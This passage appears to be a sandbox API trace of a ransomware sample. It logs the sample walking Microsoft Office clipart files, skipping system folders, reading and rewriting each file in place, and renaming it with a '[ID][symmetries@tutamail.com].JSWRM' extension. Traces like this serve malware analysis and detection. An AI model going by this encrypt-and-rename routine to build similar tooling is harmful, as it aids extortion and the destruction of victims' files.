lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00390_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0091.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00390_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00390_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00390_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0091.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0091.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.362] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8642) returned 1 [0091.362] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x21c0) returned 0x205850 [0091.362] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x21c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x21c0, lpOverlapped=0x0) returned 1 [0091.364] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.364] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x21c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x21c0, lpOverlapped=0x0) returned 1 [0091.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.364] CloseHandle (hObject=0x314) returned 1 [0091.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0091.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0091.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0091.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0091.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0091.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0091.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0091.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0091.365] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00390_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00390_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00390_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0091.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0091.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.365] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00391_.WMF", cAlternateFileName="")) returned 1 [0091.365] lstrcmpiW (lpString1="NA00391_.WMF", lpString2=".") returned 1 [0091.365] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="..") returned 1 [0091.365] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="...") returned 1 [0091.366] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="windows") returned -1 [0091.366] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="recovery") returned -1 [0091.366] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="perflogs") returned -1 [0091.366] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="documents and settings") returned 1 [0091.366] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.366] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="system volume information") returned -1 [0091.366] lstrcmpiW (lpString1="NA00391_.WMF", lpString2="msocache") returned 1 [0091.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0091.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00391_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00391_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00391_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0091.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.366] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00391_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00391_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00391_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0091.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0091.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00391_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.385] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8684) returned 1 [0091.385] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x21e0) returned 0x205850 [0091.385] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x21e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x21e0, lpOverlapped=0x0) returned 1 [0091.387] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.387] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x21e0, lpOverlapped=0x0) returned 1 [0091.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.387] CloseHandle (hObject=0x314) returned 1 [0091.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0091.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0091.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0091.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0091.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0091.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.388] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00391_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00391_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00391_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0091.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.389] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ad4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00394_.WMF", cAlternateFileName="")) returned 1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2=".") returned 1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="..") returned 1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="...") returned 1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="windows") returned -1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="recovery") returned -1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="perflogs") returned -1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="documents and settings") returned 1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="system volume information") returned -1 [0091.389] lstrcmpiW (lpString1="NA00394_.WMF", lpString2="msocache") returned 1 [0091.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0091.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00394_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00394_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00394_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0091.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00394_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00394_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00394_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0091.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0091.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00394_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.390] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10964) returned 1 [0091.390] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ad0) returned 0x24d210 [0091.390] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ad0, lpOverlapped=0x0) returned 1 [0091.392] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.392] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ad0, lpOverlapped=0x0) returned 1 [0091.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.393] CloseHandle (hObject=0x314) returned 1 [0091.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0091.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0091.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0091.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0091.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0091.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0091.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.393] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00394_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00394_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00394_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0091.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0091.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0091.394] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x194a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00395_.WMF", cAlternateFileName="")) returned 1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2=".") returned 1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="..") returned 1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="...") returned 1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="windows") returned -1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="recovery") returned -1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="perflogs") returned -1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="documents and settings") returned 1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="system volume information") returned -1 [0091.394] lstrcmpiW (lpString1="NA00395_.WMF", lpString2="msocache") returned 1 [0091.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0091.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00395_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00395_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00395_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0091.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00395_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00395_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00395_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0091.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00395_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00395_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 